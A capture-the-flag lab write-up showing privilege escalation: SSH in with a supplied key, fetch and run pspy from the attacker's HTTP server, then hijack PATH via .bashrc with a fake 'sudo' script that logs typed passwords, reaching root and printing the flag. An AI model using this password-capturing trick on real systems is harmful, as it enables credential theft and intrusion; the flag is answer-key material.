Eavesdropper
Last updated
Last updated
Download Task Files
Hello again, hacker. After uncovering a user Frank's SSH private key, you've broken into a target environment.
Download the SSH private key attached.
Note: If you are using the AttackBox, you can copy and paste the SSH private key using the "Clipboard" icon located on the slide-out tray, as demonstrated by the GIF below:
Answer the questions below
Download the attached file.
Completed
Start Machine
You have access under frank, but you want to be root! How can you escalate privileges? If you listen closely, maybe you can uncover something that might help!
Note: Please allow 3-5 minutes for the VM to boot up fully before attempting the challenge.
Answer the questions below
┌──(witty㉿kali)-[~/Downloads]
└─$ cat idrsa.id-rsa
-----BEGIN OPENSSH PRIVATE KEY-----
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
F5iAvxBl12p5cAAAAKam9obkBhbGllbgE=
-----END OPENSSH PRIVATE KEY-----
┌──(witty㉿kali)-[~/Downloads]
└─$ chmod 600 idrsa.id-rsa
┌──(witty㉿kali)-[~/Downloads]
└─$ ssh -i idrsa.id-rsa frank@10.10.85.42
Welcome to Ubuntu 20.04.4 LTS (GNU/Linux 5.4.0-96-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
This system has been minimized by removing packages and content that are
not required on a system that users do not log into.
To restore this content, you can run the 'unminimize' command.
Last login: Thu Mar 2 16:49:31 2023 from 172.18.0.3
frank@workstation:~$ whoami
frank
frank@workstation:~$ find / -perm -4000 2>/dev/null | xargs ls -lah
-rwsr-xr-x 1 root root 84K Jul 14 2021 /usr/bin/chfn
-rwsr-xr-x 1 root root 52K Jul 14 2021 /usr/bin/chsh
-rwsr-xr-x 1 root root 87K Jul 14 2021 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 55K Feb 7 2022 /usr/bin/mount
-rwsr-xr-x 1 root root 44K Jul 14 2021 /usr/bin/newgrp
-rwsr-xr-x 1 root root 67K Jul 14 2021 /usr/bin/passwd
-rwsr-xr-x 1 root root 67K Feb 7 2022 /usr/bin/su
-rwsr-xr-x 1 root root 163K Jan 19 2021 /usr/bin/sudo
-rwsr-xr-x 1 root root 39K Feb 7 2022 /usr/bin/umount
-rwsr-xr-- 1 root messagebus 51K Jun 11 2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 463K Dec 2 2021 /usr/lib/openssh/ssh-keysign
frank@workstation:~$ sudo -l
[sudo] password for frank:
Sorry, try again.
[sudo] password for frank:
Sorry, try again.
[sudo] password for frank:
sudo: 3 incorrect password attempts
┌──(witty㉿kali)-[~/Downloads]
└─$ python3 -m http.server 7070
Serving HTTP on 0.0.0.0 port 7070 (http://0.0.0.0:7070/) ...
10.10.85.42 - - [02/Mar/2023 11:55:27] "GET /pspy64 HTTP/1.1" 200 -
frank@workstation:/tmp$ wget http://10.8.19.103:7070/pspy64
--2023-03-02 16:55:27-- http://10.8.19.103:7070/pspy64
Connecting to 10.8.19.103:7070... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3104768 (3.0M) [application/octet-stream]
Saving to: ‘pspy64’
pspy64 100%[============================>] 2.96M 812KB/s in 3.7s
2023-03-02 16:55:32 (812 KB/s) - ‘pspy64’ saved [3104768/3104768]
frank@workstation:/tmp$ chmod +x pspy64
frank@workstation:/tmp$ ./pspy64
pspy - version: v1.2.1 - Commit SHA: f9e6a1590a4312b9faa093d8dc84e19567977a6d
██▓███ ██████ ██▓███ ▓██ ██▓
▓██░ ██▒▒██ ▒ ▓██░ ██▒▒██ ██▒
▓██░ ██▓▒░ ▓██▄ ▓██░ ██▓▒ ▒██ ██░
▒██▄█▓▒ ▒ ▒ ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
▒██▒ ░ ░▒██████▒▒▒██▒ ░ ░ ░ ██▒▓░
▒▓▒░ ░ ░▒ ▒▓▒ ▒ ░▒▓▒░ ░ ░ ██▒▒▒
░▒ ░ ░ ░▒ ░ ░░▒ ░ ▓██ ░▒░
░░ ░ ░ ░ ░░ ▒ ▒ ░░
░ ░ ░
░ ░
Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scanning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
2023/03/02 16:56:19 CMD: UID=1000 PID=1790 | ./pspy64
2023/03/02 16:56:19 CMD: UID=1000 PID=1011 | -bash
2023/03/02 16:56:19 CMD: UID=1000 PID=1010 | sshd: frank@pts/0
2023/03/02 16:56:19 CMD: UID=0 PID=996 | sshd: frank [priv]
2023/03/02 16:56:19 CMD: UID=0 PID=1 | sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups
2023/03/02 16:56:34 CMD: UID=0 PID=1797 | sshd: [accepted]
2023/03/02 16:56:34 CMD: UID=0 PID=1798 | sshd: [accepted]
2023/03/02 16:56:34 CMD: UID=0 PID=1799 | sshd: frank [priv]
2023/03/02 16:56:34 CMD: UID=0 PID=1800 | sh -c /usr/bin/env -i PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin run-parts --lsbsysinit /etc/update-motd.d > /run/motd.dynamic.new
2023/03/02 16:56:34 CMD: UID=0 PID=1801 | run-parts --lsbsysinit /etc/update-motd.d
2023/03/02 16:56:34 CMD: UID=0 PID=1802 | /bin/sh /etc/update-motd.d/00-header
2023/03/02 16:56:34 CMD: UID=0 PID=1803 | /bin/sh /etc/update-motd.d/00-header
2023/03/02 16:56:34 CMD: UID=0 PID=1804 | /bin/sh /etc/update-motd.d/00-header
2023/03/02 16:56:34 CMD: UID=0 PID=1805 | run-parts --lsbsysinit /etc/update-motd.d
2023/03/02 16:56:34 CMD: UID=0 PID=1806 | run-parts --lsbsysinit /etc/update-motd.d
2023/03/02 16:56:34 CMD: UID=0 PID=1807 | run-parts --lsbsysinit /etc/update-motd.d
2023/03/02 16:56:34 CMD: UID=0 PID=1808 | sshd: frank [priv]
2023/03/02 16:56:34 CMD: UID=1000 PID=1809 | sshd: frank@pts/1
2023/03/02 16:56:35 CMD: UID=1000 PID=1810 | sshd: frank@pts/1
2023/03/02 16:56:36 CMD: UID=1000 PID=1811 | sshd: frank@pts/1
2023/03/02 16:56:37 CMD: UID=1000 PID=1812 | sshd: frank@pts/1
2023/03/02 16:56:37 CMD: UID=1000 PID=1813 | /bin/sh /usr/sbin/service --status-all
2023/03/02 16:56:37 CMD: UID=1000 PID=1814 | /bin/sh /usr/sbin/service --status-all
2023/03/02 16:56:37 CMD: UID=1000 PID=1815 | /bin/sh /usr/sbin/service --status-all
2023/03/02 16:56:37 CMD: UID=1000 PID=1816 | /bin/sh /etc/init.d/dbus status
2023/03/02 16:56:37 CMD: UID=1000 PID=1818 | /bin/sh /usr/sbin/service --status-all
2023/03/02 16:56:37 CMD: UID=1000 PID=1817 | /bin/sh /usr/sbin/service --status-all
2023/03/02 16:56:37 CMD: UID=1000 PID=1819 | /bin/sh /usr/sbin/service --status-all
2023/03/02 16:56:37 CMD: UID=1000 PID=1820 | /bin/sh /etc/init.d/hwclock.sh status
2023/03/02 16:56:37 CMD: UID=1000 PID=1822 | /bin/sh /usr/sbin/service --status-all
2023/03/02 16:56:37 CMD: UID=1000 PID=1821 | /bin/sh /usr/sbin/service --status-all
2023/03/02 16:56:37 CMD: UID=1000 PID=1823 | /bin/sh /usr/sbin/service --status-all
2023/03/02 16:56:37 CMD: UID=1000 PID=1824 | /bin/sh /etc/init.d/procps status
2023/03/02 16:56:37 CMD: UID=1000 PID=1825 | /bin/sh /etc/init.d/procps status
2023/03/02 16:56:37 CMD: UID=1000 PID=1826 | /bin/sh /etc/init.d/procps status
2023/03/02 16:56:37 CMD: UID=1000 PID=1827 | /bin/sh /etc/init.d/procps status
2023/03/02 16:56:37 CMD: UID=1000 PID=1829 | /bin/sh /usr/sbin/service --status-all
2023/03/02 16:56:37 CMD: UID=1000 PID=1828 | /bin/sh /usr/sbin/service --status-all
2023/03/02 16:56:37 CMD: UID=1000 PID=1830 | /bin/sh /usr/sbin/service --status-all
2023/03/02 16:56:37 CMD: UID=1000 PID=1833 | /bin/sh /etc/init.d/ssh status
2023/03/02 16:56:37 CMD: UID=1000 PID=1832 | /bin/sh /etc/init.d/ssh status
2023/03/02 16:56:37 CMD: UID=1000 PID=1831 | /bin/sh /etc/init.d/ssh status
2023/03/02 16:56:37 CMD: UID=1000 PID=1834 | /bin/sh /etc/init.d/ssh status
2023/03/02 16:56:37 CMD: UID=1000 PID=1835 | /bin/sh /etc/init.d/ssh status
2023/03/02 16:56:37 CMD: UID=1000 PID=1836 | /bin/sh /etc/init.d/ssh status
2023/03/02 16:56:37 CMD: UID=1000 PID=1838 | /bin/sh /usr/sbin/service --status-all
2023/03/02 16:56:37 CMD: UID=1000 PID=1837 | /bin/sh /usr/sbin/service --status-all
2023/03/02 16:56:38 CMD: UID=1000 PID=1839 | sshd: frank@pts/1
2023/03/02 16:56:39 CMD: UID=1000 PID=1840 | sshd: frank@pts/1
2023/03/02 16:56:39 CMD: UID=0 PID=1841 | sudo cat /etc/shadow
2023/03/02 16:56:59 CMD: UID=0 PID=1842 | sshd: [accepted]
2023/03/02 16:56:59 CMD: UID=0 PID=1843 | sshd: [accepted]
2023/03/02 16:56:59 CMD: UID=0 PID=1844 | sshd: frank [priv]
2023/03/02 16:56:59 CMD: UID=0 PID=1845 | sh -c /usr/bin/env -i PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin run-parts --lsbsysinit /etc/update-motd.d > /run/motd.dynamic.new
2023/03/02 16:56:59 CMD: UID=0 PID=1846 | run-parts --lsbsysinit /etc/update-motd.d
2023/03/02 16:56:59 CMD: UID=0 PID=1847 | /bin/sh /etc/update-motd.d/00-header
2023/03/02 16:56:59 CMD: UID=0 PID=1848 | /bin/sh /etc/update-motd.d/00-header
2023/03/02 16:56:59 CMD: UID=0 PID=1849 | /bin/sh /etc/update-motd.d/00-header
2023/03/02 16:56:59 CMD: UID=0 PID=1850 | run-parts --lsbsysinit /etc/update-motd.d
2023/03/02 16:56:59 CMD: UID=0 PID=1851 | run-parts --lsbsysinit /etc/update-motd.d
2023/03/02 16:56:59 CMD: UID=0 PID=1852 | run-parts --lsbsysinit /etc/update-motd.d
2023/03/02 16:56:59 CMD: UID=0 PID=1853 | sshd: frank [priv]
2023/03/02 16:56:59 CMD: UID=1000 PID=1854 | sshd: frank@pts/1
2023/03/02 16:57:00 CMD: UID=1000 PID=1855 | sshd: frank@pts/1
2023/03/02 16:57:01 CMD: UID=1000 PID=1856 | sshd: frank@pts/1
2023/03/02 16:57:02 CMD: UID=1000 PID=1857 | sshd: frank@pts/1
2023/03/02 16:57:02 CMD: UID=1000 PID=1858 | /bin/sh /usr/sbin/service --status-all
2023/03/02 16:57:02 CMD: UID=1000 PID=1859 | /bin/sh /usr/sbin/service --status-all
2023/03/02 16:57:02 CMD: UID=1000 PID=1860 | /bin/sh /usr/sbin/service --status-all
2023/03/02 16:57:02 CMD: UID=1000 PID=1861 | /bin/sh /etc/init.d/dbus status
2023/03/02 16:57:02 CMD: UID=1000 PID=1863 | /bin/sh /usr/sbin/service --status-all
2023/03/02 16:57:02 CMD: UID=1000 PID=1862 | /bin/sh /usr/sbin/service --status-all
2023/03/02 16:57:02 CMD: UID=1000 PID=1864 | /bin/sh /usr/sbin/service --status-all
2023/03/02 16:57:02 CMD: UID=1000 PID=1865 | /bin/sh /etc/init.d/hwclock.sh status
2023/03/02 16:57:02 CMD: UID=1000 PID=1867 | /bin/sh /usr/sbin/service --status-all
2023/03/02 16:57:02 CMD: UID=1000 PID=1866 | /bin/sh /usr/sbin/service --status-all
2023/03/02 16:57:02 CMD: UID=1000 PID=1868 | /bin/sh /usr/sbin/service --status-all
2023/03/02 16:57:02 CMD: UID=1000 PID=1869 | /bin/sh /etc/init.d/procps status
2023/03/02 16:57:02 CMD: UID=1000 PID=1870 | /bin/sh /etc/init.d/procps status
2023/03/02 16:57:02 CMD: UID=1000 PID=1871 | /bin/sh /etc/init.d/procps status
2023/03/02 16:57:02 CMD: UID=1000 PID=1872 | /bin/sh /etc/init.d/procps status
2023/03/02 16:57:02 CMD: UID=1000 PID=1874 | /bin/sh /usr/sbin/service --status-all
2023/03/02 16:57:02 CMD: UID=1000 PID=1873 | /bin/sh /usr/sbin/service --status-all
2023/03/02 16:57:02 CMD: UID=1000 PID=1875 | /bin/sh /usr/sbin/service --status-all
2023/03/02 16:57:02 CMD: UID=1000 PID=1878 | /bin/sh /etc/init.d/ssh status
2023/03/02 16:57:02 CMD: UID=1000 PID=1877 | /bin/sh /etc/init.d/ssh status
2023/03/02 16:57:02 CMD: UID=1000 PID=1876 | /bin/sh /etc/init.d/ssh status
2023/03/02 16:57:02 CMD: UID=1000 PID=1879 | /bin/sh /etc/init.d/ssh status
2023/03/02 16:57:02 CMD: UID=1000 PID=1880 | /bin/sh /etc/init.d/ssh status
2023/03/02 16:57:02 CMD: UID=1000 PID=1881 | /bin/sh /etc/init.d/ssh status
2023/03/02 16:57:02 CMD: UID=1000 PID=1883 | /bin/sh /usr/sbin/service --status-all
2023/03/02 16:57:02 CMD: UID=1000 PID=1882 | /bin/sh /usr/sbin/service --status-all
2023/03/02 16:57:03 CMD: UID=1000 PID=1884 | sshd: frank@pts/1
2023/03/02 16:57:04 CMD: UID=1000 PID=1885 | sshd: frank@pts/1
2023/03/02 16:57:05 CMD: UID=0 PID=1886 | sudo cat /etc/shadow
frank@workstation:/tmp$ ps aux
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.7 12172 7224 ? Ss 16:40 0:00 sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups
root 996 0.0 0.9 13576 9032 ? Ss 16:49 0:00 sshd: frank [priv]
frank 1010 0.2 0.7 15264 7656 ? S 16:49 0:02 sshd: frank@pts/0
frank 1011 0.0 0.3 5992 3896 pts/0 Ss 16:49 0:00 -bash
frank 2657 0.0 0.3 7644 3232 pts/0 R+ 17:04 0:00 ps aux
frank@workstation:/tmp$ netstat -tulpn
(No info could be read for "-p": geteuid()=1000 but you should be root.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.11:34385 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
udp 0 0 127.0.0.11:48841 0.0.0.0:* -
frank@workstation:/tmp$ echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
frank@workstation:/tmp$ cat /etc/hosts
127.0.0.1 localhost
::1 localhost ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
172.18.0.2 workstation
frank@workstation:/tmp$ tcpdump -A -i eth1 -w /tmp/tcpdump.pcap
-bash: tcpdump: command not found
frank@workstation:/tmp$ ethercap
-bash: ethercap: command not found
frank@workstation:~$ pwd
/home/frank
frank@workstation:~$ ls -lah
total 32K
drwxr-xr-x 1 frank frank 4.0K Mar 14 2022 .
drwxr-xr-x 1 root root 4.0K Mar 14 2022 ..
lrwxrwxrwx 1 frank frank 9 Mar 14 2022 .bash_history -> /dev/null
-rw-r--r-- 1 frank frank 220 Feb 25 2020 .bash_logout
-rw-r--r-- 1 frank frank 3.7K Feb 25 2020 .bashrc
drwx------ 2 frank frank 4.0K Mar 14 2022 .cache
-rw-r--r-- 1 frank frank 807 Feb 25 2020 .profile
drwxr-xr-x 1 frank frank 4.0K Mar 14 2022 .ssh
-rw-r--r-- 1 frank frank 0 Mar 14 2022 .sudo_as_admin_successful
frank@workstation:~$ head .bashrc
# ~/.bashrc: executed by bash(1) for non-login shells.
# see /usr/share/doc/bash/examples/startup-files (in the package bash-doc)
# for examples
# If not running interactively, don't do anything
case $- in
*i*) ;;
*) return;;
esac
`bashrc` stands for "Bourne-Again SHell Run Commands", and it is a shell script that is run by Bash, the default shell for most Linux distributions and macOS. The `bashrc` file contains a set of commands that are executed every time a new Bash shell is started.
The `bashrc` file is typically located in the user's home directory (`~/.bashrc`) and can be edited using a text editor such as `nano` or `vim`. The file can be used to customize the behavior of the Bash shell, including setting environment variables, defining aliases, and creating functions.
Some common examples of customizations that can be made in the `bashrc` file include setting the default prompt, adding directories to the system path, and defining shortcuts for frequently used commands.
It's important to note that changes made to the `bashrc` file only take effect in new Bash shells that are started after the changes have been made. If you want to apply the changes immediately, you can either log out and log back in, or run the command `source ~/.bashrc` to reload the `bashrc` file in the current shell.
you can change the PATH environment variable in the `bashrc` file to add directories to the system path.
The PATH environment variable is a list of directories separated by colons (`:`), and it tells the shell where to look for executable files when a command is entered. By default, the PATH variable includes system directories such as `/usr/bin` and `/usr/local/bin`, but you can add additional directories to the PATH by modifying the `bashrc` file.
In the command `export PATH=/home/frank/bin:$PATH`, the `/home/frank/bin` directory is added to the beginning of the `PATH` variable. This means that when you enter a command, the shell will first search for an executable file in `/home/frank/bin`, and if it doesn't find the file there, it will continue searching in the directories listed in the rest of the `PATH` variable.
In the command `export PATH=$PATH:/home/frank/bin`, the `/home/frank/bin` directory is added to the end of the `PATH` variable. This means that the shell will search for an executable file in all of the directories listed in the `PATH` variable first, and if it doesn't find the file in any of those directories, it will then search in `/home/frank/bin`.
So, depending on the situation, one command may be more appropriate than the other. If you want to give priority to executables in a specific directory, you should use the first command. If you want to add a new directory to the existing `PATH` variable, you should use the second command.
so let's choose the first
placing a false 'sudo' file to be executed
frank@workstation:~$ /bin/sudo -l
[sudo] password for frank:
Sorry, try again.
[sudo] password for frank:
Sorry, try again.
[sudo] password for frank:
sudo: 3 incorrect password attempts
Creating a "bin" directory is a common convention in Unix-like systems, and it is often used to store executable files and scripts that can be run from the command line. By convention, the directories `/bin`, `/usr/bin`, and `/usr/local/bin` are reserved for system executables, while the directory `~/bin` (i.e., a "bin" directory in the user's home directory) is often used for user-specific executables and scripts.
frank@workstation:~$ mkdir ./bin
frank@workstation:~$ ls -lah
total 36K
drwxr-xr-x 1 frank frank 4.0K Mar 2 18:45 .
drwxr-xr-x 1 root root 4.0K Mar 14 2022 ..
lrwxrwxrwx 1 frank frank 9 Mar 14 2022 .bash_history -> /dev/null
-rw-r--r-- 1 frank frank 220 Feb 25 2020 .bash_logout
-rw-r--r-- 1 frank frank 3.7K Feb 25 2020 .bashrc
drwx------ 2 frank frank 4.0K Mar 14 2022 .cache
-rw-r--r-- 1 frank frank 807 Feb 25 2020 .profile
drwxr-xr-x 1 frank frank 4.0K Mar 14 2022 .ssh
-rw-r--r-- 1 frank frank 0 Mar 14 2022 .sudo_as_admin_successful
drwxrwxr-x 2 frank frank 4.0K Mar 2 18:45 bin
frank@workstation:~$ ls
bin
The `mkdir ./bin` command creates a new directory called "bin" in the current directory.
frank@workstation:~/bin$ nano sudo
frank@workstation:~/bin$ chmod +x sudo
frank@workstation:~/bin$ cat sudo
#!/bin/bash
read password
echo $password >> /home/frank/password_L.txt
frank@workstation:~/bin$ cd ..
frank@workstation:~$ nano .bashrc
frank@workstation:~$ head .bashrc
# ~/.bashrc: executed by bash(1) for non-login shells.
# see /usr/share/doc/bash/examples/startup-files (in the package bash-doc)
# for examples
export PATH=/home/frank/bin:$PATH
# If not running interactively, don't do anything
case $- in
*i*) ;;
*) return;;
frank@workstation:~$ chmod +x ./bin/sudo
frank@workstation:~$ ls
bin password_L.txt
frank@workstation:~$ cat password_L.txt
!@#frankisawesome2022%*
!@#frankisawesome2022%*
!@#frankisawesome2022%*
!@#frankisawesome2022%*
!@#frankisawesome2022%*
!@#frankisawesome2022%*
frank@workstation:~$ sudo -l
[sudo] password for frank: !@#frankisawesome2022%*
Matching Defaults entries for frank on workstation:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User frank may run the following commands on workstation:
(ALL : ALL) ALL
frank@workstation:~$ sudo -s
root@workstation:/home/frank# cd /root
root@workstation:~# ls
flag.txt
root@workstation:~# cat flag.txt
flag{14370304172628f784d8e8962d54a600}
root@workstation:~# ls -lah
total 20K
drwx------ 1 root root 4.0K Mar 14 2022 .
drwxr-xr-x 1 root root 4.0K Mar 14 2022 ..
-rw-r--r-- 1 root root 3.1K Dec 5 2019 .bashrc
-rw-r--r-- 1 root root 161 Dec 5 2019 .profile
-rw-r--r-- 1 root root 39 Mar 14 2022 flag.txt
root@workstation:~# cat .profile
# ~/.profile: executed by Bourne-compatible login shells.
if [ "$BASH" ]; then
if [ -f ~/.bashrc ]; then
. ~/.bashrc
fi
fi
mesg n 2> /dev/null || true
root@workstation:~# head .bashrc
# ~/.bashrc: executed by bash(1) for non-login shells.
# see /usr/share/doc/bash/examples/startup-files (in the package bash-doc)
# for examples
# If not running interactively, don't do anything
[ -z "$PS1" ] && return
# don't put duplicate lines in the history. See bash(1) for more options
# ... or force ignoredups and ignorespace
HISTCONTROL=ignoredups:ignorespace
root@workstation:~# ls -lah /
total 68K
drwxr-xr-x 1 root root 4.0K Mar 14 2022 .
drwxr-xr-x 1 root root 4.0K Mar 14 2022 ..
-rwxr-xr-x 1 root root 0 Mar 14 2022 .dockerenv
lrwxrwxrwx 1 root root 7 Mar 2 2022 bin -> usr/bin
drwxr-xr-x 2 root root 4.0K Apr 15 2020 boot
drwxr-xr-x 5 root root 340 Mar 2 16:40 dev
drwxr-xr-x 1 root root 4.0K Mar 14 2022 etc
drwxr-xr-x 1 root root 4.0K Mar 14 2022 home
lrwxrwxrwx 1 root root 7 Mar 2 2022 lib -> usr/lib
lrwxrwxrwx 1 root root 9 Mar 2 2022 lib32 -> usr/lib32
lrwxrwxrwx 1 root root 9 Mar 2 2022 lib64 -> usr/lib64
lrwxrwxrwx 1 root root 10 Mar 2 2022 libx32 -> usr/libx32
drwxr-xr-x 2 root root 4.0K Mar 2 2022 media
drwxr-xr-x 2 root root 4.0K Mar 2 2022 mnt
drwxr-xr-x 2 root root 4.0K Mar 2 2022 opt
dr-xr-xr-x 156 root root 0 Mar 2 16:40 proc
drwx------ 1 root root 4.0K Mar 14 2022 root
drwxr-xr-x 1 root root 4.0K Mar 2 18:55 run
lrwxrwxrwx 1 root root 8 Mar 2 2022 sbin -> usr/sbin
drwxr-xr-x 2 root root 4.0K Mar 2 2022 srv
dr-xr-xr-x 13 root root 0 Mar 2 16:40 sys
drwxrwxrwt 1 root root 4.0K Mar 2 16:55 tmp
drwxr-xr-x 1 root root 4.0K Mar 2 2022 usr
drwxr-xr-x 1 root root 4.0K Mar 2 2022 var
We were in a container I knew itWhat is the flag in root's home directory?
What's going on in the system?
flag{14370304172628f784d8e8962d54a600}
[[BlueTeam]]
